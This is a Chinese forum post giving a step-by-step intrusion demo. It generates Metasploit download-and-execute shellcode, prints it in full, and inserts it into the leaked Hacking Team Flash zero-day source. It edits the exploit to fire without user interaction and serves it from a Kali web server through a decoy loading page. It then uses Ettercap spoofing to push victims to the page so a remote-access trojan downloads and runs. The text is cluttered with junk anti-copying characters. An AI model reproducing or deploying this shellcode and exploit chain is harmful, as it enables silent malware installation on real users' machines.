|
' r" Z( k/ l+ o" s1 f 三、flash 0day之手工代码修改制作下载者实例入侵演示
. l! @+ ?% o% G+ _* Q
9 G5 w8 \+ N3 J# t+ s# s9 Q/ _: }( s- X1 f' H; W& I* n3 `3 t+ ~% t2 u
利用到的工具:
9 T" K4 k8 u1 W1 r) ]* r/ D! z6 X9 O + k! |6 M# H5 B1 u
/ {) |+ V, |5 D( T! T+ O3 g Msf 1 y% k6 P# N: v B* |
2 t. m& Y: J4 ?+ ^8 `( r2 C4 ?8 D& k6 }- X B. w* Y( @4 e
Ettercap
- N& W' q- M/ m! t, q) b
6 }: \1 s. _ q0 o6 |9 @
! ]$ M) v/ a1 w0 I+ y* q$ }! G+ N Adobe Flash CS6
/ @8 Y. P- W1 P% ]+ \, H ' s7 a: h5 e* K) P( ?! K% f
3 n9 D6 ~8 B/ m R Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
1 H; L/ C2 N- n7 @$ z6 o6 O 4 q* p( C0 N4 W4 o* S) J
3 Y* p6 l1 }; P- c. s 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
% e) T4 }4 k6 _ 7 l" P. e- @) R3 [
: j6 k5 v% o; w7 c( _) | 如图:
: U$ c! @) P7 x) u% q( [' L" g" h
- A. E3 q7 S2 }% N! n/ J% }
* ~0 K0 o& {9 w( C6 R* Z0 H : U) d" G6 \7 ]
% I" S3 T8 H/ U2 p5 g
$ ]/ C- c* ]( `5 h 
& p% _+ K- L; n4 f0 @1 q# s % a! A- B5 p1 X$ H9 H% \* v
* o1 Q5 @3 {$ N" u2 u. F8 [6 h, @& D 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: 5 W( [% F5 S8 o
* b9 y2 f; j, o/ b+ T! X* h4 B/ ~
6 o6 z3 h- L0 J8 D% t, S8 Y 5 U, I0 ?+ T n! g. q6 M
, ?' ^4 x+ Q- ?/ B' q k
) t( e/ R' ~! h$ f7 Q 
2 _ m1 H: v d 4 _7 g- e. h) `' M$ Q
' Y5 ?6 z9 G$ G/ ~
然后执行generate -t dword生成shellcode,如下: # _! V! ^5 x) u- R, m' g& e" z
0 n4 t/ D$ }+ Y5 ~
& u$ e [1 u) d9 ?
 " k! V: A; j2 B# c, d
* c& f; i1 i: s$ ?6 D$ F1 L
- D: o6 g x: u6 N( h 复制代码到文本下便于我们一会编辑flash exp,如下: ' H4 s8 Q0 D& ^9 G3 T, a
) C& s# J* P8 C/ s7 a$ N% ~* O
) t8 E$ j# W) W' u( p, Z 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, % \; l1 h* } @( r" H
# \# X `/ R5 S, n
& S& q4 z0 i. P0 r- _# R, Z 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 1 K z/ k2 R: [+ [5 |0 I* k7 } k
( l% G: M$ N3 {1 j1 \3 h$ F; M2 Z, t0 C# D! w f/ m3 c* y3 q' \5 f) k
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 5 o- ?) T* d" ^" e" d$ ]
7 U- x6 s: S/ B* u% x
% M9 H& l. L$ K5 \0 m) ~0 S& R 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
1 Q, z$ w1 Y& f, _
7 |4 H! F: N+ |2 h* R+ @ ]9 ^. m
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, 6 j6 [$ r' `; D9 k! k& t- |& G
4 O) t) I: R; O v5 i% R Q
5 B2 f" L0 n: R. G 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, : c) v- r( n) K/ k3 D, j
3 l$ }$ `% z$ N/ J+ G2 a; w) X
$ O. y/ [7 j* m* \# k( V
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, . J2 z; h! g3 m: Q. ^
: ~) x1 n) f K
8 {' G8 ]3 B7 G& X% R% f1 h 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 8 k$ s) K7 I! P4 S$ F
" L; K, W4 e& x/ Y! y$ w7 d
" ^: {7 J" J k# o 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 4 d+ b2 @0 L& R% \& _/ m+ c4 A
! T6 T* g7 K. f1 v1 N+ e
2 a- Z4 Z* C3 o 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
5 r" P0 ?0 \3 x* `7 _: a
% t' Q7 e% }# z! T1 l/ ^$ ]& l3 d3 `* ?% |* Z
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, : b* n9 b9 t1 [: U0 m5 @3 g1 {8 U
% D( W9 h, q6 D( U5 [7 U X
( q# [3 t5 z( g$ |' o) t
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
; L% }6 k; `# ^1 J0 L# {
/ E6 x/ W( N3 C- d& W9 Y3 p' Q( ~1 U! f' P2 {
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 8 C0 F/ }0 V9 `& D% u/ i5 g+ I6 I
3 H7 X, `6 ?9 l% a$ }
& P7 x. c, V& ], \ 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 $ S% k: w* R0 I0 \
( h. _6 X/ k" l
5 `% k* } P0 d7 _% G8 p h+ M3 C
" p6 E3 k0 C" ] v8 D
" o& `' t- H0 o D
/ ^7 R! r; W p
1 H8 x% v+ _8 N; S, }+ O4 H e 9 B0 v" {! H- Y0 g' T& X4 M
. m8 N8 k5 I' V D* i: N3 b1 H 下面我们来修改flash 0day exp,需要修改三个文件,分别为:
+ z' c0 H R# x/ L9 j1 K1 v* _- v0 Z
: Z9 t" b6 e/ x1 W$ x6 e+ j7 L/ W; U" ^! g- s" B) G/ C
2 s0 y' S* m$ u9 T% e3 D( q
' e5 s* E2 p2 Y$ U9 k2 B# B* |) n M+ @
先修改ShellWin32.as,部分源代码如图: ( z5 {6 l+ ?, @7 g
% L: ^: i9 H, `7 m9 J5 p- E1 U
# h! K6 p5 E1 ^
 U0 A* ^: X; L5 Y: W8 T5 p
& ]# C) H' J1 \, D2 B# i# A) S3 G. k8 J: Y. T1 I/ o
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 2 ]# I3 K( Y, W, Z& n- `9 L6 g
8 i# A! P& I) r' i2 l* x" b k* E+ F
, v% C7 R# |/ s; k2 w  ( w4 ?3 W; d- Z7 j4 E6 g" h
# a" S1 W" L! P# S+ q6 B: [2 m
Z7 |0 W, v9 o1 H
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
3 n6 U" v" W, b1 \2 O% ^ ; `" N9 h4 D2 l
: k0 |( s1 n( W3 G
 7 p* K3 W# P: d* r
9 I& y! r9 Z; B# Q9 J9 @; u0 o
& g; Z! |0 @- V0 w) E3 J8 M/ s 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: ' d* ?( i, D0 ~: J6 N& j
, O5 r/ Z* S3 {3 S$ \5 m+ R0 c/ P- i1 |4 F
& Z: W) x+ b( Z. D3 t8 }7 t0 P
" y1 I( p: P* F# u$ n2 V* J! V 3 d' R9 m* C" ^
, O7 o# W$ ?7 `; C
, @( K0 r9 a, W# b# B
( q+ m) c% a. E/ b" v4 L/ A2 s% a A+ w3 B! ]
 8 U% U* K- ~: J* m1 U: G( a
3 J* O2 y" ~( X; y
* b" a' T# {, u8 Q! H% r% c2 R1 Q+ l 然后点保存,下面我们来编译一下,打开 * _. H' \' s7 [+ |' c; V
* z- S- J: U6 h/ X* Q0 N
9 s* x9 N8 D8 e8 {/ m* d# ] exp1.fla然后点文件-发布,看看编译没错误
* t4 ~- s" [* N; { # x. ]- [2 S C( g# I
. t( a3 h6 E# x3 l+ N
3 x9 Q% l0 s8 c9 D# x# e4 y
+ y( g! d& W' l2 I: v4 B+ Q4 s0 G& h! b7 L& Z) T( ~! s
# G `. |/ E- P+ o5 T7 Y0 M- `! v
' a, X! R$ C5 P0 k6 d# U
9 z8 R( n# y; c
- \( r* B% c* [$ ?1 _. I
6 } f4 j% Q5 W. Q* P. N5 S: L. Q* X1 _# C( Q1 j
& i$ [/ }7 K: U; D
' C# ?: U4 P y4 B) S; | I# B# W: Y$ a! k/ r
然后我们把生成的 # t, r" E% r7 d& W0 h4 i4 [
* `5 q' d; Y, y4 j& D# X1 r
3 |- i5 R! c/ { exp1.swf丢到kailinux 的/var/www/html下: 5 p C2 l( R2 |$ m" [
+ U* j( p! k5 Z; A, @+ F( q8 f- k% V/ ^
然后把这段代码好好编辑一下 6 @2 M- I7 g9 _; ^4 A
' B* \' j5 k* Q. e7 U, J
' v- e) Y R" w9 L: u0 d! X4 q! A. p
) R+ q0 q0 H0 }- h2 @
! Q8 h2 ~* r* _8 |3 r
, a, Q) u4 B6 J" @2 V* T
1 I% @. [/ M; ]7 e* }5 Q
7 n9 L5 L% P3 m$ s1 Z6 u
. q8 O! q# I2 P! z9 B D$ _9 ~
; K" y @- U, m! [1 L ! I) z- p. m# L& E! r
; X" a) ]6 C8 {" K8 N& h 4 y$ X+ a. Y/ P7 Z( h
9 }7 a$ v2 H2 }/ Q' \, [& ?9 n4 j' U1 e4 | t; a
9 g# V% L2 T4 ?4 H0 }' p % w1 T. g; U0 ^; j0 P
( N7 U |5 b" T L7 h) L 7 k6 R2 S3 \7 k& m" f8 n0 V0 M; h3 ]
8 y% c9 J$ O. c2 Y; K& f% Y6 V" e: `2 t
<!DOCTYPE html> ~) g" H3 u+ N% E
0 c, L+ [9 Y5 i/ `0 r* D' I
3 O2 }6 _ o* V$ g
<html> 2 D7 N: M$ `, S( z2 ?6 h& B
4 z. b2 v, U. v4 R; n; B
7 w6 y' |! E) \$ ~ <head> - k) k, K# n4 y) v7 h
( {# q/ S6 Q2 b7 v0 D
' S" h, V! X: M9 Z0 H
<meta http-equiv="Content-Type" content="text/html;
0 V i& ^( y5 r, u$ Q' V2 O 7 i+ v; G' N) `: D+ t
+ p: X o, J$ [, F charset=utf-8"/> 9 R9 I' H5 }3 P$ n& i* I! c
: c2 I2 f# t$ p, @% f$ m7 B' b& E$ W$ e, O, A
</head>
1 N8 c! E! v9 T3 `+ ?6 C3 P7 F
9 I6 c& }* F: w1 g1 i/ }4 x8 d6 z9 @: z; |6 i% O: a6 h8 F
<body> 4 s: z4 a6 J* W$ L4 V9 ^
* `" h2 t. s/ f6 d: h G2 m$ u M
/ o( N1 \3 W/ l4 Y <h2> Please wait, the requested page is loading...</h2>
* Z+ P4 j4 S0 l9 Q1 r! @+ Z) m# o
3 f6 L3 K% I6 j/ e, U' B/ `! F! R$ k) Q5 Z
<br>
; q' k( b2 N# o4 x6 z
8 L; O: k* D9 V; |, w6 T, c) o0 P& N& V0 ` G
<OBJECT : R2 Q+ C0 n: ~9 I- y
9 |# j. w- r0 Z8 g5 m9 t9 ]3 h! _+ I
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie
$ T# }& T- Q- d. J7 F! R4 i ; ]$ J4 e, a' D; ]2 b0 H# E
- j" v6 R7 E7 [8 R2 @! E VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 8 G$ o( J$ u5 U X2 y: O
# k1 @+ S0 T" p) x5 g. I( ]: A+ d7 S9 o6 @3 \
</body>
?; P2 U0 ~* h+ [5 _6 ` ( A7 M& O0 n l- M
8 S7 p; ?! }; B0 U8 f O <script>
: p, p5 B1 o8 K. @5 Y 6 ~0 U! m" Z1 W+ G: U
* O0 o/ }1 s9 S( q setTimeout(function () {
9 }1 b* t9 |5 C' i+ ?3 k$ N
1 x: r0 I8 J2 P+ W6 z# K3 u Z1 t- B$ A4 m8 ^% A: q8 T J3 w: y
3 \. n' ?1 N; ]" L7 V 6 ^" D3 o* D7 M0 `1 P; a# b. m
# T& n4 N, e: r3 P- z3 t# T window.location.reload();
) F! |! q- P$ q3 x% V0 h
! J/ P6 J6 J! d+ u; Q( v# t1 B+ L) V; |+ J3 M6 ?
}, 10000);
7 z6 h& s d" E" K, W8 B5 `4 { 4 |; ~& B4 C7 z. Q7 J& p; Q$ } {
! D# t6 q" S, {; H5 Z6 e6 `1 S # a' ?9 b) s: k
4 H+ k/ |4 e2 r+ E
O4 X& m; {8 Y( | </script>
0 ?, Q" R* o- \7 u- s( b5 u - n9 @5 V) `2 {3 T5 y0 ^- O
2 E0 \8 Z+ P \3 h$ Q </html>
) M5 m4 @ I5 k+ \ ! w! f6 G, ?3 \5 z
8 X' X0 b$ n) r' k/ x& r7 P
3 K! x# E& E$ M8 A5 h( O/ V
* \* ]5 d4 R. B; m# I6 h# l& F5 O6 P1 P- g' h
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
`4 G- ^4 U! n + F( @! o+ B h+ w5 i+ l$ n
, w4 J0 E0 z) [# h6 z
 " _. G$ o; ]7 ~. y9 e+ ]
! W8 K0 m1 ^" t( H7 P) p: c* ^
' x8 [. k2 A3 w0 k/ x+ }" [% [ ) K) l# {- y, W5 S* d+ ^
& j) O( f0 v- `% V; U b. ?2 i B. S# |( ~ J8 [4 y2 x
8 W+ ?# j' E1 ]$ a: @$ G/ h. ]
# i0 J g0 R% c' n* Y' x9 o6 B
L1 }4 U! E- e& B" x" r
/ E& q, i9 b2 N. `( Y8 U
2 H( P$ A# ~4 r, o" x) Y: L6 m- }" q8 R, \# |
5 W3 {' d! L' n 0 L2 s) J8 U9 N, n" d5 V+ K
" c8 z \ Q7 j1 h" n
下面我们用ettercap欺骗如图:
8 b7 l2 H5 U& Y6 X
. M r, Y* b; u# x5 @! J* a) F% [; f- }( U0 g7 G8 r
7 {' i$ Q# _" G$ K 4 J3 P0 T, E6 I0 M7 C z. X
0 `; H- @7 R. R: A- x( `; g4 N
6 N3 j8 o: o! g
% Z, S3 V1 S0 }
" X0 ^6 F Z" Z 下面我们随便访问个网站看看: ( {" K* V1 n1 A* y$ H" n/ M9 p+ h- z
- R$ X: g" j$ `9 s" ^* |3 A+ m9 J. g+ E p0 H3 C
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 5 Q, S) l% w$ S& U) @4 u
0 [! Y( f% I9 e' R" n& c# u: P* p/ j% H' ^* \$ @( T6 {* \+ T- N
5 q) y( s# m6 N$ x4 W' C' z
0 Z4 ^6 _+ b! f) K0 f$ E" a( \4 m& E/ J" V- b" w; {0 c, l$ E3 w
我们看另一台,
$ K" ^7 H$ N' _# ~) r- }
! v8 u& C' {( i% [" m' F, h- c, j# ^1 j
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。
- R7 Y* b" m5 e# |0 Y. S& F | 
发表于 2018-10-20 20:28:55
收藏
支持
反对